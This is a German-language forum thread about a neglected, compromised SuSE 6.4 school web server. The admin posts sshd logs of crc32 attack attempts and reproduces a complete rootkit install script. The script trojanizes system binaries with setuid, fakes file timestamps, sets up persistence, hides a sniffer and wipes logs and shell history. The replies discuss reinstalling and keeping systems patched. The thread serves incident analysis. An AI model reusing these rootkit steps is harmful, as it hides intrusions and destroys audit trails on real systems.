Gehackter Server

[stefaan]

Servus!

Hab letztens von einem Win-Admin einen Linux-Webserver bekommen, um zu schauen, warum er nicht mehr geht

Vorweg: Es PC-Händler hat einer Schule einen Webserver mit der damals aktuellen Suse 6.4 geliefert, der stand bis jetzt in der Ecke und tat seinen Dienst... Ohne Updates, ohne alles...

Jetzt hab ich ihn mir einmal angeschaut:
Ich kann mich nicht einloggen...
www login: root <enter>
www login:
Und das kommt immer wieder...

Mit Knoppix gebootet, /var/log/messages geschaut:

Code:

Jul 24 16:17:00 www sshd[20139]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:05 www sshd[20141]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:08 www sshd[20142]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:10 www sshd[20143]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:15 www sshd[20145]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:18 www sshd[20146]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:23 www sshd[20148]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:26 www sshd[20149]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:29 www sshd[20150]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:31 www sshd[20151]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:37 www sshd[20153]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:18:46 www sshd[20180]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:07 www sshd[20193]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:20 www sshd[20195]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:58 www sshd[20201]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:13 www sshd[20204]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:18 www sshd[20206]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:21 www sshd[20207]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:34 www sshd[20212]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:54 www sshd[20220]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:59 www sshd[20222]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:02 www sshd[20223]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:25 www sshd[20232]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:27 www sshd[20233]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:40 www sshd[20238]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:42 www sshd[20239]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:05 www sshd[20248]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:08 www sshd[20249]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:11 www sshd[20250]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:23:16 www sshd[20252]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:28:57 www syslogd 1.3-3: restart

Na lieb, der sshd, bei Suse 6.4 Version 1.2.2, wenn ich das richtig gefunden habe...

Im Wurzelverzeichnis hab ich noch eine Datei names kk.tgz gefunden, Google hat allerdings dazu nichts ausgespuckt.
Darin waren 27 Dateien, darunter ein Haufen Programme wie top, netstat, ls, find, du usw...
Hier das "Install-Script":

Code:

#!/bin/sh
echo "  - Installation ..."

for i in {2,3,4,5} 
do 
cp -f S80rpcmap /etc/rc.d/rc$i.d/
done
#
mkdir /usr/doc/.spool
mkdir /usr/doc/kern
mkdir /var/log/ssh
#
cd kern
make all
mv string.o /usr/doc/kern/
mv var /usr/doc/kern/
#
cd ../ssh
mv ssh_host_key /var/log/ssh/
mv ssh_random_seed /var/log/ssh
mv squid /usr/doc/.spool/
mv squid.conf /usr/doc/.spool/
#
cd ../utils
mv sniffy sl3y show clear wpe st str.sh /usr/doc/.spool
chattr -i /usr/bin/top > /dev/null 2>&1
touch -acmr /usr/bin/top top
rm -rf /usr/bin/top
mv -f top /usr/bin/top
chmod 4555 /usr/bin/top
#
chattr -i /sbin/syslogd > /dev/null 2>&1
killall -9 syslogd
touch -acmr /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chmod 4555 /sbin/syslogd
#
chattr -i /bin/ls > /dev/null 2>&1
touch -acmr /bin/ls ls
mv -f ls /bin/ls
chmod 4555 /bin/ls
#
chattr -i /bin/netstat > /dev/null 2>&1
mkdir -p /usr/lib/kterm
chattr -i /usr/lib/kterm/.1addr > /dev/null 2>&1
chattr -i /usr/lib/kterm/.1proc > /dev/null 2>&1
mv -f .1addr /usr/lib/kterm
mv -f .1proc /usr/lib/kterm
chattr +i /usr/lib/kterm/.1addr
chattr +i /usr/lib/kterm/.1proc
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
mv -f find /usr/bin/find
chmod 4555 /bin/netstat
chmod 4555 /usr/bin/find
#
chattr -i /usr/bin/du > /dev/null 2>&1
touch -acmr /usr/bin/du du
mv -f du /usr/bin/du
chmod 4555 /usr/bin/du
#
chattr -i /usr/src/linux/arch/alpha/lib/.lib/ > /dev/null 2>&1
mkdir -p /usr/src/linux/arch/alpha/lib/.lib/ 
mv .1file /usr/src/linux/arch/alpha/lib/.lib/ 
chattr +i /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/bin/top
chattr +i /bin/netstat
chattr +i /usr/bin/find
chattr +i /sbin/syslogd
#
cd ..
./debug
rm -rf S80rpcmap debug kern/ ssh/ utils/ ../r.tgz ../r2.tgz ../rk.tar.gz ../rk.tgz install
cd kern
/usr/doc/kern/var u var.c > /dev/null 2>&1
cd ../..
rm -rf rk
#news
echo "unset HISTFILE">>/etc/profile
rm -f /sbin/rpc.statd /usr/sbin/rpc.statd
rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
echo -e "\n - Gata ! - L-am Facut ! - "

Schaut also ziemlich gehackt aus
Leider ist das /var/log/secure weg... /usr wurde auch gelöscht... Gibts sonst noch ein Log, wo die IPs drinnen sein könnten?

Grüße, Stefan

PS: Kommt davon, wenn ein PC-Händler einfach Suse 6.4 draufspielt und vergammeln lässt Und der Typ is Citirix Certified Admin...

Grüße, Stefan

[bernie]

Hi,

du solltest die Maschine auf jeden Fall neu aufsetzen. Dein Passwort ist jetzt sicher auch irgendwo gespeichert.

Aber sonst find ich das nett

Ciao, Bernie

[stefaan]

Servus!

Klar wird da neu aufgesetzt... Oder glaubst du, ich zieh ein Yast-Online-Update rein?
Und wenn, dann Redhat, nix Suse...

Danke für den Passworthinweis, werd ich weiterleiten...

Übrigens, du kommst ja aus Wien... So gehts bei uns in Mistelbach zu...

Grüße, Stefan

[Ulli Ivens]

So einen Händler kenne ich auch.... der sagt "Never change a running System"

Ist ja eigentlich auch OK, aber Sicherheitsupdates MÜSSEN sein !!

Sonst passiert sowas

[cyrip]

tu dir einen gefallen und nimm debian... mit einfachen cronjobs mach das selber updates von allem, was da so drauf ist...

[stefaan]

Servus!

Werde schaun... Hab die 3.0er CDs schon da liegen, habs aber noch nie installiert gehabt... Das soll ja ein Server werden und kein Spielsystem

Aber ich bekomme dieses Wochenende einen neuen (alten) PC zum Testen... mal schaun...

Außerdem: Die Updates bekomme ich ja bezahlt

Grüße, Stefan

[wilson]

das cs ist wirklich sehr entzückend!!

und das mein ich ernst

[derRichard]

Original geschrieben von cyrip
tu dir einen gefallen und nimm debian... mit einfachen cronjobs mach das selber updates von allem, was da so drauf ist...

<don't shoot me>

wie währe es mit gentoo?
alle 12 stunden

Code:

emerge rsync
emerge -u world
emerge clean

mit cron machen und dein system ist auch immer aktuell...

</don't shoot me>

mfg
richard

[darkmoon.2xt.de]

Übrigens das ganz oben sieht nach einer Art selbstgebasteltem Rootkit aus, könnte das ein Schüler gemacht haben (an fast jeder Schule gibts 1-2 Linuxfreaks) ?

darkmoon.2xt.de

[stefaan]

Servus!

Das bezweifle ich.... Hier handelt es sich um eine Schule, in der Kindergärtnerinnen ausgebildet werden
Außerdem war das mitten in den Ferien...

(Und wenn, dann hätte sich das sicherlich schon unter den Mitschülern herumgesprochen).

Soeben hat mir der "zuständige" Admin mitgeteilt, dass von diesem IP-Bereich jemand belästigt wurde...

Grüße, Stefan

[Spike05]

Original geschrieben von stefaan
Servus!

Werde schaun... Hab die 3.0er CDs schon da liegen, habs aber noch nie installiert gehabt... Das soll ja ein Server werden und kein Spielsystem

Deswegen sollst du ja auch Debian draufhauen, damit es kein Spielsystem wird!!!

So schwer ist die Debian-Installation nur wirklich nicht! (Übrigens sind die Debian-Entwickler gerade heftig dabei einen grafischen Installer zu coden! )

cu

Jochen

[Peace-on-earth]

Na, schön. Genau das gleiche Spiel hatte ich mit meinem SuSE-7.3-Server nun auch. Wie wahrscheinlich ist es eigentlich mit einem Linux-System gehackt zu werden? Warum kommt denn SuSE hier so schlecht weg?

[Spike05]

Also wenn man sein System auf dem laufenden hält, dann ist es AFAIK sehr sicher!
Nur gehört halt ein bißchen Arbeit dazu: ständige Information über aktuelle Sicherheistlücken und sofortiges Einspielen der Updates und Patches!

SuSE ist genauso sicher wie sein Anwender! Soll heißen ob es jetzt SuSE, RedHat, Mandrake, Debian, Gentoo oder sonst irgendwas ist, es ist immer der Admin für die Sicherheit zuständig nicht das Betriebssystem!!!

cu

Jochen

[Peace-on-earth]

<<SuSE ist genauso sicher wie sein Anwender!

Na, dann schein ich ja recht unsicher zu sein. Wenn das jetzt meine Freundin wüßte......

[bernie]

Hi,

nur wenige Systeme bleiben ab den Setup "sicher". Und wenn Netzwerk-Services drauf laufen kannst es gleich vergessen. Irgendwann wird jede Software gehackt (jaja, qmail, tinydns usw nicht ). Der wohl beliebteste Angriffspunkt ist der SSH Daemon. Hatte ich ein paar mal.

Ciao, Bernie